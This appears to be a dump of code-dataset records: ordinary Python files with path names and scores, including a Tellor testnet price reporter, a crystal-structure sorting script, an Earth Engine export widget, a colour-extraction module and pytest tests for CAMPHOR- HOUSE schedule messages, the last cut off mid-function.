PUBLISH_DIRECTORY = "publish"
JUNIT_RESULTS_FILE_NAME = "tests.xml"
RESULTS_SUMMARY_FILE_NAME = "test-results.json"
COVERAGE_SUMMARY_FILE_NAME = "coverage.json"
__COBERTURA_COVERAGE_FILE_NAME = "coverage.xml"
__COBERTURA_NON_WINDOWS_COVERAGE_FILE_NAME = "coverage-non-windows.xml"
def get_coverage_file_name():
"""
Get the coverage file for the specific operating system class.
This is needed as Windows uses a different file name hierarchy than the others.
"""
if sys.platform.startswith("win"):
return __COBERTURA_COVERAGE_FILE_NAME
return __COBERTURA_NON_WINDOWS_COVERAGE_FILE_NAME
class MainlineExecutor(InProcessExecution):
"""
Class to provide for a local instance of a InProcessExecution class.
"""
def __init__(self, use_module=False, use_main=False):
super().__init__()
self.__use_main = use_main
self.__entry_point = "__main.py__" if use_module else "main.py"
resource_directory = os.path.join(os.getcwd(), "test", "resources")
assert os.path.exists(resource_directory)
assert os.path.isdir(resource_directory)
self.resource_directory = resource_directory
def execute_main(self):
if self.__use_main:
main()
else:
ProjectSummarizer().main()
def get_main_name(self):
return self.__entry_point
def test_get_summarizer_version():
"""
Make sure that we can get information about the version of the summarizer.
"""
# Arrange
executor = MainlineExecutor()
suppplied_arguments = ["--version"]
expected_output = """\
main.py 0.5.0
"""
expected_error = ""
expected_return_code = 0
# Act
execute_results = executor.invoke_main(arguments=suppplied_arguments, cwd=None)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
# pylint: disable=consider-using-with
def setup_directories(
create_report_directory=True,
create_publish_directory=False,
temporary_work_directory=None,
):
"""
Setup a temporary directory, a report directory under it (created if necessary),
and the publish directory (not created by default if necessary).
"""
if not temporary_work_directory:
temporary_work_directory = tempfile.TemporaryDirectory()
report_directory = os.path.join(temporary_work_directory.name, "report")
if create_report_directory:
os.makedirs(report_directory)
publish_directory = os.path.join(temporary_work_directory.name, "publish")
if create_publish_directory:
os.makedirs(publish_directory)
return temporary_work_directory, report_directory, publish_directory
# pylint: enable=consider-using-with | 0.365117 | 0.113432 |
import asyncio
import json
from typing import Any
from typing import Mapping
import requests
from telliot.datafeed.data_feed import DataFeed
from telliot.reporter.base import Reporter
from telliot.submitter.base import Submitter
from telliot.utils.abi import tellor_playground_abi
from web3 import Web3
# TODO: placeholder for actual ConfigOptions clas
temp_config = {"node_url": "", "private_key": ""}
class RinkebySubmitter(Submitter):
"""Submits BTC on testnet.
Submits BTC price data in USD to the TellorX playground
on the Rinkeby test network."""
def __init__(self, config: Mapping[str, str]) -> None:
"""Reads user private key and node endpoint from `.env` file to
set up `Web3` client for interacting with the TellorX playground
smart contract."""
self.config = config
self.w3 = Web3(Web3.HTTPProvider(config["node_url"]))
self.acc = self.w3.eth.account.from_key(config["private_key"])
self.playground = self.w3.eth.contract(
"0x4699845F22CA2705449CFD532060e04abE3F1F31", abi=tellor_playground_abi
)
def tobytes32(self, request_id: str) -> bytes:
"""Casts request_id as bytes32."""
return bytes(request_id, "ascii")
def tobytes(self, value: int) -> Any:
"""Casts value as a bytes array."""
return Web3.toBytes(hexstr=Web3.toHex(text=str(value)))
def build_tx(self, value: float, request_id: str, gas_price: str) -> Any:
"""Assembles needed transaction data."""
request_id_bytes = self.tobytes32(request_id)
value_bytes = self.tobytes(int(value * 1e6))
nonce = self.playground.functions.getNewValueCountbyRequestId(
request_id_bytes
).call()
print("nonce:", nonce)
acc_nonce = self.w3.eth.get_transaction_count(self.acc.address)
transaction = self.playground.functions.submitValue(
request_id_bytes, value_bytes, nonce
)
estimated_gas = transaction.estimateGas()
print("estimated gas:", estimated_gas)
built_tx = transaction.buildTransaction(
{
"nonce": acc_nonce,
"gas": estimated_gas,
"gasPrice": self.w3.toWei(gas_price, "gwei"),
"chainId": 4, # rinkeby
}
)
return built_tx
def submit_data(self, value: float, request_id: str) -> Any:
"""Submits data on-chain & provides a link to view the
successful transaction."""
req = requests.get("https://ethgasstation.info/json/ethgasAPI.json")
prices = json.loads(req.content)
gas_price = str(prices["fast"])
print("retrieved gas price:", gas_price)
tx = self.build_tx(value, request_id, gas_price)
tx_signed = self.acc.sign_transaction(tx)
tx_hash = self.w3.eth.send_raw_transaction(tx_signed.rawTransaction)
_ = self.w3.eth.wait_for_transaction_receipt(tx_hash, timeout=360)
print(f"View reported data: https://rinkeby.etherscan.io/tx/{tx_hash.hex()}")
class IntervalReporter(Reporter):
"""Submits the price of BTC to the TellorX playground
every 10 seconds."""
def __init__(self, datafeeds: Mapping[str, DataFeed], datafeed_uid: str) -> None:
self.datafeeds = datafeeds
self.datafeed_uid = datafeed_uid
self.submitter = RinkebySubmitter(temp_config)
async def report(self) -> None:
"""Update all off-chain values (BTC/USD) & store those values locally."""
"""Submit latest BTC/USD values to the Tellor oracle."""
while True:
jobs = []
for datafeed in self.datafeeds.values():
if datafeed.uid == self.datafeed_uid:
job = asyncio.create_task(datafeed.update_value(store=True))
jobs.append(job)
_ = await asyncio.gather(*jobs)
for uid, datafeed in self.datafeeds.items():
if datafeed.value:
print(f"Submitting value for {uid}: {datafeed.value.val}")
q = datafeed.get_query()
if q is not None:
"""TODO:
- Should encode value using query response type.
- Also use request ID encoded by query
- Decide if these goes here or in submitter.
"""
# TODO: Should use query to encode value. Request ID
# from query is already in bytes. Probably
# be part of submitter
encoded_value = q.response_type.encode(datafeed.value.val)
print(encoded_value) # Dummy print to pass tox style
request_id_str = "0x" + q.request_id.hex()
self.submitter.submit_data(datafeed.value.val, request_id_str)
else:
print(f"Skipping submission for {uid}, datafeed value not updated")
await asyncio.sleep(10)
def run(self) -> None: # type: ignore
"""Used by telliot CLI to update & submit BTC/USD price data to Tellor Oracle."""
# Create coroutines to run concurrently.
loop = asyncio.get_event_loop()
_ = loop.create_task(self.report())
# Blocking loop.
try:
loop.run_forever()
except (KeyboardInterrupt, SystemExit):
loop.close() | src/telliot/reporter/simple_interval.py | import asyncio
import json
from typing import Any
from typing import Mapping
import requests
from telliot.datafeed.data_feed import DataFeed
from telliot.reporter.base import Reporter
from telliot.submitter.base import Submitter
from telliot.utils.abi import tellor_playground_abi
from web3 import Web3
# TODO: placeholder for actual ConfigOptions clas
temp_config = {"node_url": "", "private_key": ""}
class RinkebySubmitter(Submitter):
"""Submits BTC on testnet.
Submits BTC price data in USD to the TellorX playground
on the Rinkeby test network."""
def __init__(self, config: Mapping[str, str]) -> None:
"""Reads user private key and node endpoint from `.env` file to
set up `Web3` client for interacting with the TellorX playground
smart contract."""
self.config = config
self.w3 = Web3(Web3.HTTPProvider(config["node_url"]))
self.acc = self.w3.eth.account.from_key(config["private_key"])
self.playground = self.w3.eth.contract(
"0x4699845F22CA2705449CFD532060e04abE3F1F31", abi=tellor_playground_abi
)
def tobytes32(self, request_id: str) -> bytes:
"""Casts request_id as bytes32."""
return bytes(request_id, "ascii")
def tobytes(self, value: int) -> Any:
"""Casts value as a bytes array."""
return Web3.toBytes(hexstr=Web3.toHex(text=str(value)))
def build_tx(self, value: float, request_id: str, gas_price: str) -> Any:
"""Assembles needed transaction data."""
request_id_bytes = self.tobytes32(request_id)
value_bytes = self.tobytes(int(value * 1e6))
nonce = self.playground.functions.getNewValueCountbyRequestId(
request_id_bytes
).call()
print("nonce:", nonce)
acc_nonce = self.w3.eth.get_transaction_count(self.acc.address)
transaction = self.playground.functions.submitValue(
request_id_bytes, value_bytes, nonce
)
estimated_gas = transaction.estimateGas()
print("estimated gas:", estimated_gas)
built_tx = transaction.buildTransaction(
{
"nonce": acc_nonce,
"gas": estimated_gas,
"gasPrice": self.w3.toWei(gas_price, "gwei"),
"chainId": 4, # rinkeby
}
)
return built_tx
def submit_data(self, value: float, request_id: str) -> Any:
"""Submits data on-chain & provides a link to view the
successful transaction."""
req = requests.get("https://ethgasstation.info/json/ethgasAPI.json")
prices = json.loads(req.content)
gas_price = str(prices["fast"])
print("retrieved gas price:", gas_price)
tx = self.build_tx(value, request_id, gas_price)
tx_signed = self.acc.sign_transaction(tx)
tx_hash = self.w3.eth.send_raw_transaction(tx_signed.rawTransaction)
_ = self.w3.eth.wait_for_transaction_receipt(tx_hash, timeout=360)
print(f"View reported data: https://rinkeby.etherscan.io/tx/{tx_hash.hex()}")
class IntervalReporter(Reporter):
"""Submits the price of BTC to the TellorX playground
every 10 seconds."""
def __init__(self, datafeeds: Mapping[str, DataFeed], datafeed_uid: str) -> None:
self.datafeeds = datafeeds
self.datafeed_uid = datafeed_uid
self.submitter = RinkebySubmitter(temp_config)
async def report(self) -> None:
"""Update all off-chain values (BTC/USD) & store those values locally."""
"""Submit latest BTC/USD values to the Tellor oracle."""
while True:
jobs = []
for datafeed in self.datafeeds.values():
if datafeed.uid == self.datafeed_uid:
job = asyncio.create_task(datafeed.update_value(store=True))
jobs.append(job)
_ = await asyncio.gather(*jobs)
for uid, datafeed in self.datafeeds.items():
if datafeed.value:
print(f"Submitting value for {uid}: {datafeed.value.val}")
q = datafeed.get_query()
if q is not None:
"""TODO:
- Should encode value using query response type.
- Also use request ID encoded by query
- Decide if these goes here or in submitter.
"""
# TODO: Should use query to encode value. Request ID
# from query is already in bytes. Probably
# be part of submitter
encoded_value = q.response_type.encode(datafeed.value.val)
print(encoded_value) # Dummy print to pass tox style
request_id_str = "0x" + q.request_id.hex()
self.submitter.submit_data(datafeed.value.val, request_id_str)
else:
print(f"Skipping submission for {uid}, datafeed value not updated")
await asyncio.sleep(10)
def run(self) -> None: # type: ignore
"""Used by telliot CLI to update & submit BTC/USD price data to Tellor Oracle."""
# Create coroutines to run concurrently.
loop = asyncio.get_event_loop()
_ = loop.create_task(self.report())
# Blocking loop.
try:
loop.run_forever()
except (KeyboardInterrupt, SystemExit):
loop.close() | 0.522933 | 0.213152 |
import logging
import sys
import pandas as pd
import glob
import os
import atools
def main():
if (not len(sys.argv) == 4):
print("""
Usage: sort_structures.py DB_file output_file file_type
DB_file (str) - file with initial list of REFCODEs
output_file (str) - file to output results of sorting to
file_type (str) - set whether to run on PDBs (enter: pdb) or CIFs (enter: cif)
""")
sys.exit()
else:
DB_file = sys.argv[1]
output_file = sys.argv[2]
file_type = sys.argv[3]
# temporary check for non-implemented issue with extractedm.cif cases
# these cases were manually collected
for i in glob.glob(f'*.{file_type}'):
if 'extractedm' in i:
logging.error('This code cannot handled extractedm cases! Please implement them.')
refcodes = sorted([i.rstrip() for i in open(DB_file, 'r').readlines()])
files = [i+'_extracted.'+file_type for i in refcodes]
logging.info(f'> started with: {len(refcodes)} structures to sort.')
if os.path.isfile(output_file):
# read structures already checked to avoid double calculations
OUTDATA = pd.read_csv(output_file)
done_files = list(OUTDATA.file)
logging.info(f'> {len(done_files)} structures already done.')
else:
# write output file
with open(output_file, 'w') as f:
f.write('file,deleted\n')
OUTDATA = pd.read_csv(output_file)
done_files = []
# iterate over files
count = len(done_files)
for file in files:
# skip done structures
if file in done_files:
continue
if os.path.isfile(file):
if file_type == 'cif':
pdb = atools.convert_CIF_2_PDB(file, wstruct=False)
elif file_type == 'pdb':
pdb = atools.check_ASE_handle(file, wstruct=False)
if pdb is None:
logging.warning(f'> ASE failed to load {file}')
# file failed to load in ASE
OUTDATA = OUTDATA.append({'file': file, 'deleted': 'M'},
ignore_index=True)
os.remove(file)
else:
logging.info(f'> doing {count} of {len(files)}')
# check if at least one molecule has a pore_diameter_opt > 0.25 angstrom
if atools.check_PDB_for_pore(file=pdb, diam=0.0):
OUTDATA = OUTDATA.append({'file': file, 'deleted': 'N'},
ignore_index=True)
else:
# delete molecule if not
OUTDATA = OUTDATA.append({'file': file, 'deleted': 'Y'},
ignore_index=True)
os.remove(file)
try:
os.remove(pdb)
except FileNotFoundError:
pass
os.remove(pdb.replace('.pdb', '_rebuild.pdb'))
else:
# file missing.
OUTDATA = OUTDATA.append({'file': file, 'deleted': 'M'},
ignore_index=True)
# add to done cifs
done_files.append(file)
# update output file
OUTDATA.to_csv(output_file, index=False)
count += 1
remaining = list(OUTDATA[OUTDATA['deleted'] == 'N']['file'])
logging.info(f'> ended with: {len(remaining)} structures.')
if __name__ == "__main__":
# logging.basicConfig(level=logging.DEBUG, format='%(levelname)s-%(message)s')
# logging.debug(f'Debug mode!')
logging.basicConfig(level=logging.INFO, format='')
main() | sort_structures.py | import logging
import sys
import pandas as pd
import glob
import os
import atools
def main():
if (not len(sys.argv) == 4):
print("""
Usage: sort_structures.py DB_file output_file file_type
DB_file (str) - file with initial list of REFCODEs
output_file (str) - file to output results of sorting to
file_type (str) - set whether to run on PDBs (enter: pdb) or CIFs (enter: cif)
""")
sys.exit()
else:
DB_file = sys.argv[1]
output_file = sys.argv[2]
file_type = sys.argv[3]
# temporary check for non-implemented issue with extractedm.cif cases
# these cases were manually collected
for i in glob.glob(f'*.{file_type}'):
if 'extractedm' in i:
logging.error('This code cannot handled extractedm cases! Please implement them.')
refcodes = sorted([i.rstrip() for i in open(DB_file, 'r').readlines()])
files = [i+'_extracted.'+file_type for i in refcodes]
logging.info(f'> started with: {len(refcodes)} structures to sort.')
if os.path.isfile(output_file):
# read structures already checked to avoid double calculations
OUTDATA = pd.read_csv(output_file)
done_files = list(OUTDATA.file)
logging.info(f'> {len(done_files)} structures already done.')
else:
# write output file
with open(output_file, 'w') as f:
f.write('file,deleted\n')
OUTDATA = pd.read_csv(output_file)
done_files = []
# iterate over files
count = len(done_files)
for file in files:
# skip done structures
if file in done_files:
continue
if os.path.isfile(file):
if file_type == 'cif':
pdb = atools.convert_CIF_2_PDB(file, wstruct=False)
elif file_type == 'pdb':
pdb = atools.check_ASE_handle(file, wstruct=False)
if pdb is None:
logging.warning(f'> ASE failed to load {file}')
# file failed to load in ASE
OUTDATA = OUTDATA.append({'file': file, 'deleted': 'M'},
ignore_index=True)
os.remove(file)
else:
logging.info(f'> doing {count} of {len(files)}')
# check if at least one molecule has a pore_diameter_opt > 0.25 angstrom
if atools.check_PDB_for_pore(file=pdb, diam=0.0):
OUTDATA = OUTDATA.append({'file': file, 'deleted': 'N'},
ignore_index=True)
else:
# delete molecule if not
OUTDATA = OUTDATA.append({'file': file, 'deleted': 'Y'},
ignore_index=True)
os.remove(file)
try:
os.remove(pdb)
except FileNotFoundError:
pass
os.remove(pdb.replace('.pdb', '_rebuild.pdb'))
else:
# file missing.
OUTDATA = OUTDATA.append({'file': file, 'deleted': 'M'},
ignore_index=True)
# add to done cifs
done_files.append(file)
# update output file
OUTDATA.to_csv(output_file, index=False)
count += 1
remaining = list(OUTDATA[OUTDATA['deleted'] == 'N']['file'])
logging.info(f'> ended with: {len(remaining)} structures.')
if __name__ == "__main__":
# logging.basicConfig(level=logging.DEBUG, format='%(levelname)s-%(message)s')
# logging.debug(f'Debug mode!')
logging.basicConfig(level=logging.INFO, format='')
main() | 0.119987 | 0.156781 |
from geetools import batch
from ipywidgets import *
class toAsset(VBox):
def __init__(self, **kwargs):
super(toAsset, self).__init__(**kwargs)
layout = Layout(width='500px')
self.bapwidget = kwargs.get('bapwidget')
self.root = kwargs.get('root', '')
self.scale = Text(description='scale', value='10')
self.destination = Select(description='Destination',
options=['ImageCollection', 'Folder'],
value='ImageCollection',
layout=layout)
self.folder = Text(description='Path to the ImageCollection',
value=self.root,
layout=layout,
style = {'description_width': 'initial'})
self.nameSub = Text(description='Name of/for the ImageCollection',
layout=layout,
style = {'description_width': 'initial'})
self.name = Text(description='Name for the Image',
layout=layout,
style = {'description_width': 'initial'})
self.exportB = Button(description='Export')
self.bands = SelectMultiple(description='Bands', layout=layout)
self.bands.observe(self.observeBands)
self.exportB.on_click(self.export)
self.destination.observe(self.observeDestination)
self.children = [self.destination, self.folder, self.nameSub,
self.name, self.bands, self.exportB]
def observeDestination(self, v):
if v['name'] == 'value':
value = v['new']
self.folder.description = "Path to the {}".format(value)
self.nameSub.description = "Name of/for the {}".format(value)
def observeBands(self, v):
extra = ['col_id', 'date', 'score']
if v['name'] == 'options':
bands = list(v['new'])
condition = all([b in bands for b in extra])
if not condition:
self.bands.options = bands+extra
def getAssetPath(self):
return "{}/{}".format(self.folder.value, self.nameSub.value)
def getAssetId(self):
return "{}/{}".format(self.getAssetPath(), self.name.value)
def export(self, v=None):
bands = self.bands.value
composite = self.bapwidget.composite().select(bands)
batch.Export.image.toAsset(composite, self.getAssetPath(),
self.name.value, self.destination.value,
float(self.scale.value),
self.bapwidget.site_widget.getRegion()) | geecomposite/widgets/export.py | from geetools import batch
from ipywidgets import *
class toAsset(VBox):
def __init__(self, **kwargs):
super(toAsset, self).__init__(**kwargs)
layout = Layout(width='500px')
self.bapwidget = kwargs.get('bapwidget')
self.root = kwargs.get('root', '')
self.scale = Text(description='scale', value='10')
self.destination = Select(description='Destination',
options=['ImageCollection', 'Folder'],
value='ImageCollection',
layout=layout)
self.folder = Text(description='Path to the ImageCollection',
value=self.root,
layout=layout,
style = {'description_width': 'initial'})
self.nameSub = Text(description='Name of/for the ImageCollection',
layout=layout,
style = {'description_width': 'initial'})
self.name = Text(description='Name for the Image',
layout=layout,
style = {'description_width': 'initial'})
self.exportB = Button(description='Export')
self.bands = SelectMultiple(description='Bands', layout=layout)
self.bands.observe(self.observeBands)
self.exportB.on_click(self.export)
self.destination.observe(self.observeDestination)
self.children = [self.destination, self.folder, self.nameSub,
self.name, self.bands, self.exportB]
def observeDestination(self, v):
if v['name'] == 'value':
value = v['new']
self.folder.description = "Path to the {}".format(value)
self.nameSub.description = "Name of/for the {}".format(value)
def observeBands(self, v):
extra = ['col_id', 'date', 'score']
if v['name'] == 'options':
bands = list(v['new'])
condition = all([b in bands for b in extra])
if not condition:
self.bands.options = bands+extra
def getAssetPath(self):
return "{}/{}".format(self.folder.value, self.nameSub.value)
def getAssetId(self):
return "{}/{}".format(self.getAssetPath(), self.name.value)
def export(self, v=None):
bands = self.bands.value
composite = self.bapwidget.composite().select(bands)
batch.Export.image.toAsset(composite, self.getAssetPath(),
self.name.value, self.destination.value,
float(self.scale.value),
self.bapwidget.site_widget.getRegion()) | 0.755817 | 0.167797 |
from PIL import Image, ImageFilter
from colormath.color_objects import LabColor, sRGBColor
from colormath.color_conversions import convert_color
from colormath.color_diff import delta_e_cie2000
import json, operator
# close enough for now
lab_def_colors = {
"red": { 'l': 5140.11747498726, 'a': 5854.540388686413, 'b': 4703.999578781808 },
"orange": { 'l': 6808.631086548932, 'a': 1570.9044095408976, 'b': 5774.29818155228 },
"yellow": { 'l': 8359.6222362322, 'a': -1587.0267095039594, 'b': 6911.928415647229 },
"green": { 'l': 4412.98556365553, 'a': -3650.8864478376727, 'b': 3505.0619996219075 },
"blue": { 'l': 3440.99427865288, 'a': 4877.356355591926, 'b': -8151.7744794282125 },
"indigo": { 'l': 2599.7405512221367, 'a': 3626.1956224077812, 'b': -3778.207207219171 },
"violet": { 'l': 6765.249743889395, 'a': 4977.408694893711, 'b': -3226.7699841644912 },
"brown": { 'l': 4029.7637431690864, 'a': 2340.1675308635104, 'b': 3428.617408173726 },
"black": { 'l': 1207.5848657907516, 'a': -0.004845706917500081, 'b': -0.09030751501910572 },
"white": { 'l': 8600.309785328083, 'a': -0.03412277570191691, 'b': -0.6359326166119672 },
"grey": { 'l': 5376.289444627731, 'a': -0.02135483610388178, 'b': -0.39798159786101905 }
}
def blur_and_resize( image ):
image = Image.open( image, 'r' )
image = image.convert( 'RGB' )
image = image.resize( (50, 50) )
image = image.filter( ImageFilter.GaussianBlur( 30 ) )
result = image.convert( 'P', palette = Image.ADAPTIVE, colors = 10 )
result.putalpha( 0 )
return result
def luminance( r, g, b ):
return 0.299 * r + 0.587 * g + 0.114 * b
def check_against_dict( i, dt ):
t = 0
for item in dt:
s = json.loads( dt[ item ] )
if abs( i - s[ 'luminance' ] ) > 100:
t += 1
if t == len( dt ):
return True
return False
def get_colors( image_path ):
try:
modified_image = blur_and_resize( image_path )
color_dict = { }
y = 0
results = { }
for co in modified_image.getcolors( (50 * 50) ):
l = luminance( co[ 1 ][ 0 ], co[ 1 ][ 1 ], co[ 1 ][ 2 ] )
if check_against_dict( l, color_dict ):
color_dict[ y ] = json.dumps(
{ 'luminance': l, 'rgb': { 'red': co[ 1 ][ 0 ], 'green': co[ 1 ][ 1 ], 'blue': co[ 1 ][ 2 ] } } )
for h in lab_def_colors:
c = json.loads( color_dict[ y ] )[ 'rgb' ]
lab = convert_color( sRGBColor( c[ 'red' ], c[ 'green' ], c[ 'blue' ] ), LabColor )
delta_e = delta_e_cie2000(
LabColor( lab_def_colors[ h ][ 'l' ], lab_def_colors[ h ][ 'a' ], lab_def_colors[ h ][ 'b' ] ),
lab )
if results.get( h ) is None or delta_e < results[ h ]:
results[ h ] = delta_e
y += 1
return sorted( results.items(), key = lambda x: x[ 1 ] )
except Exception as e:
print( e ) | color.py | from PIL import Image, ImageFilter
from colormath.color_objects import LabColor, sRGBColor
from colormath.color_conversions import convert_color
from colormath.color_diff import delta_e_cie2000
import json, operator
# close enough for now
lab_def_colors = {
"red": { 'l': 5140.11747498726, 'a': 5854.540388686413, 'b': 4703.999578781808 },
"orange": { 'l': 6808.631086548932, 'a': 1570.9044095408976, 'b': 5774.29818155228 },
"yellow": { 'l': 8359.6222362322, 'a': -1587.0267095039594, 'b': 6911.928415647229 },
"green": { 'l': 4412.98556365553, 'a': -3650.8864478376727, 'b': 3505.0619996219075 },
"blue": { 'l': 3440.99427865288, 'a': 4877.356355591926, 'b': -8151.7744794282125 },
"indigo": { 'l': 2599.7405512221367, 'a': 3626.1956224077812, 'b': -3778.207207219171 },
"violet": { 'l': 6765.249743889395, 'a': 4977.408694893711, 'b': -3226.7699841644912 },
"brown": { 'l': 4029.7637431690864, 'a': 2340.1675308635104, 'b': 3428.617408173726 },
"black": { 'l': 1207.5848657907516, 'a': -0.004845706917500081, 'b': -0.09030751501910572 },
"white": { 'l': 8600.309785328083, 'a': -0.03412277570191691, 'b': -0.6359326166119672 },
"grey": { 'l': 5376.289444627731, 'a': -0.02135483610388178, 'b': -0.39798159786101905 }
}
def blur_and_resize( image ):
image = Image.open( image, 'r' )
image = image.convert( 'RGB' )
image = image.resize( (50, 50) )
image = image.filter( ImageFilter.GaussianBlur( 30 ) )
result = image.convert( 'P', palette = Image.ADAPTIVE, colors = 10 )
result.putalpha( 0 )
return result
def luminance( r, g, b ):
return 0.299 * r + 0.587 * g + 0.114 * b
def check_against_dict( i, dt ):
t = 0
for item in dt:
s = json.loads( dt[ item ] )
if abs( i - s[ 'luminance' ] ) > 100:
t += 1
if t == len( dt ):
return True
return False
def get_colors( image_path ):
try:
modified_image = blur_and_resize( image_path )
color_dict = { }
y = 0
results = { }
for co in modified_image.getcolors( (50 * 50) ):
l = luminance( co[ 1 ][ 0 ], co[ 1 ][ 1 ], co[ 1 ][ 2 ] )
if check_against_dict( l, color_dict ):
color_dict[ y ] = json.dumps(
{ 'luminance': l, 'rgb': { 'red': co[ 1 ][ 0 ], 'green': co[ 1 ][ 1 ], 'blue': co[ 1 ][ 2 ] } } )
for h in lab_def_colors:
c = json.loads( color_dict[ y ] )[ 'rgb' ]
lab = convert_color( sRGBColor( c[ 'red' ], c[ 'green' ], c[ 'blue' ] ), LabColor )
delta_e = delta_e_cie2000(
LabColor( lab_def_colors[ h ][ 'l' ], lab_def_colors[ h ][ 'a' ], lab_def_colors[ h ][ 'b' ] ),
lab )
if results.get( h ) is None or delta_e < results[ h ]:
results[ h ] = delta_e
y += 1
return sorted( results.items(), key = lambda x: x[ 1 ] )
except Exception as e:
print( e ) | 0.372277 | 0.354573 |
from datetime import datetime
import pytest
import pytz
import textwrap
import app
SCHEDULE_LINK = 'https://camph.net/schedule/'
class TestEvent:
def test_from_json(self):
tz = pytz.timezone("Asia/Tokyo")
d = {
"start": "2015-11-02T17:00:00+09:00",
"end": "2015-11-02T20:00:00+09:00",
"url": "https://example.com/",
"title": "Open"
}
e = app.Event.from_json(d)
assert e.start == tz.localize(datetime(2015, 11, 2, 17, 0, 0))
assert e.end == tz.localize(datetime(2015, 11, 2, 20, 0, 0))
assert e.title == "Open"
assert e.url == "https://example.com/"
d = {
"start": "2015-11-02T17:00:00+09:00",
"end": "2015-11-02T20:00:00+09:00",
"url": None,
"title": "Open"
}
e = app.Event.from_json(d)
assert e.start == tz.localize(datetime(2015, 11, 2, 17, 0, 0))
assert e.end == tz.localize(datetime(2015, 11, 2, 20, 0, 0))
assert e.title == "Open"
assert e.url is None
def test_from_json_where_time_is_invalid(self):
d = {
"start": "ABCDEF",
"end": "GHIJK",
"url": None,
"title": "Open"
}
with pytest.raises(ValueError):
app.Event.from_json(d)
def test_from_json_where_json_has_missing_key(self):
d = {
"title": "Open"
}
# TODO: we should raise more appropriate exception?
with pytest.raises(KeyError):
app.Event.from_json(d)
def test_generate_day_messages_with_open(self):
tz = pytz.timezone("Asia/Tokyo")
e = app.Event(
start=datetime(2017, 3, 3, 15, tzinfo=tz),
end=datetime(2017, 3, 3, 19, tzinfo=tz),
url=None,
title="Open")
mg = app.MessageGenerator(
events=[e],
now=datetime(2017, 3, 3, 10, tzinfo=tz),
week=False)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
本日の CAMPHOR- HOUSE の開館時間は15:00〜19:00です。
みなさんのお越しをお待ちしています!!
その他の開館日はこちら
{SCHEDULE_LINK}""")]
def test_generate_day_messages_with_open_and_make(self):
tz = pytz.timezone("Asia/Tokyo")
e0 = app.Event(
start=datetime(2021, 8, 2, 15, tzinfo=tz),
end=datetime(2021, 8, 2, 19, tzinfo=tz),
url=None,
title="Open")
e1 = app.Event(
start=datetime(2021, 8, 2, 15, tzinfo=tz),
end=datetime(2021, 8, 2, 19, tzinfo=tz),
url=None,
title="Make")
mg = app.MessageGenerator(
events=[e0, e1],
now=datetime(2021, 8, 2, 10, tzinfo=tz),
week=False)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
本日の CAMPHOR- HOUSE の開館時間は15:00〜19:00です。
CAMPHOR- Make も利用できます。
みなさんのお越しをお待ちしています!!
その他の開館日はこちら
{SCHEDULE_LINK}""")]
e0 = app.Event(
start=datetime(2021, 8, 2, 15, tzinfo=tz),
end=datetime(2021, 8, 2, 19, tzinfo=tz),
url=None,
title="Open")
e1 = app.Event(
start=datetime(2021, 8, 2, 16, tzinfo=tz),
end=datetime(2021, 8, 2, 19, tzinfo=tz),
url=None,
title="Make")
mg = app.MessageGenerator(
events=[e0, e1],
now=datetime(2021, 8, 2, 10, tzinfo=tz),
week=False)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
本日の CAMPHOR- HOUSE の開館時間は15:00〜19:00です。
CAMPHOR- Make は16:00〜19:00に利用できます。
みなさんのお越しをお待ちしています!!
その他の開館日はこちら
{SCHEDULE_LINK}""")]
def test_generate_day_messages_with_online_open(self):
tz = pytz.timezone("Asia/Tokyo")
e = app.Event(
start=datetime(2020, 4, 12, 15, tzinfo=tz),
end=datetime(2020, 4, 12, 19, tzinfo=tz),
url=None,
title="Online Open")
mg = app.MessageGenerator(
events=[e],
now=datetime(2020, 4, 12, 10, tzinfo=tz),
week=False)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
本日の CAMPHOR- HOUSE のオンライン開館時間は15:00〜19:00です。
詳しくはCAMPHOR-のSlackをご覧ください!!
その他の開館日はこちら
{SCHEDULE_LINK}""")]
def test_generate_day_messages_with_event(self):
tz = pytz.timezone("Asia/Tokyo")
e = app.Event(
start=datetime(2017, 3, 3, 17, tzinfo=tz),
end=datetime(2017, 3, 3, 19, tzinfo=tz),
url="https://example.com/",
title="Python Event")
mg = app.MessageGenerator(
events=[e],
now=datetime(2017, 3, 3, 10, tzinfo=tz),
week=False)
message = mg.generate_messages()
assert message == [textwrap.dedent("""\
「Python Event」を17:00〜19:00に開催します!
みなさんのお越しをお待ちしています!!
https://example.com/""")]
e = app.Event(
start=datetime(2017, 3, 3, 17, tzinfo=tz),
end=datetime(2017, 3, 3, 19, tzinfo=tz),
url=None,
title="Python Event")
mg = app.MessageGenerator(
events=[e],
now=datetime(2017, 3, 3, 10, tzinfo=tz),
week=False)
message = mg.generate_messages()
assert message == [textwrap.dedent("""\
「Python Event」を17:00〜19:00に開催します!
みなさんのお越しをお待ちしています!!""")]
def test_generate_day_messages_with_open_make_and_online_open(self):
tz = pytz.timezone("Asia/Tokyo")
e0 = app.Event(
start=datetime(2021, 8, 7, 17, tzinfo=tz),
end=datetime(2021, 8, 7, 19, tzinfo=tz),
url=None,
title="Open")
e1 = app.Event(
start=datetime(2021, 8, 7, 18, tzinfo=tz),
end=datetime(2021, 8, 7, 19, tzinfo=tz),
url=None,
title="Make")
e2 = app.Event(
start=datetime(2021, 8, 7, 21, tzinfo=tz),
end=datetime(2021, 8, 7, 23, tzinfo=tz),
url=None,
title="Online Open")
mg = app.MessageGenerator(
events=[e0, e1, e2],
now=datetime(2021, 8, 7, 10, tzinfo=tz),
week=False)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
本日の CAMPHOR- HOUSE の開館時間は17:00〜19:00です。
CAMPHOR- Make は18:00〜19:00に利用できます。
みなさんのお越しをお待ちしています!!
その他の開館日はこちら
{SCHEDULE_LINK}"""),
textwrap.dedent(f"""\
本日の CAMPHOR- HOUSE のオンライン開館時間は21:00〜23:00です。
詳しくはCAMPHOR-のSlackをご覧ください!!
その他の開館日はこちら
{SCHEDULE_LINK}""")]
def test_generate_day_message_where_title_is_missing(self):
tz = pytz.timezone("Asia/Tokyo")
e = app.Event(
start=datetime(2017, 3, 3, 17, tzinfo=tz),
end=datetime(2017, 3, 3, 19, tzinfo=tz),
url=None,
title="")
mg = app.MessageGenerator(
events=[e],
now=datetime(2017, 3, 3, 10, tzinfo=tz),
week=False)
message = mg.generate_messages()
assert message == []
def test_generate_day_message_where_duplicate_events(self):
tz = pytz.timezone("Asia/Tokyo")
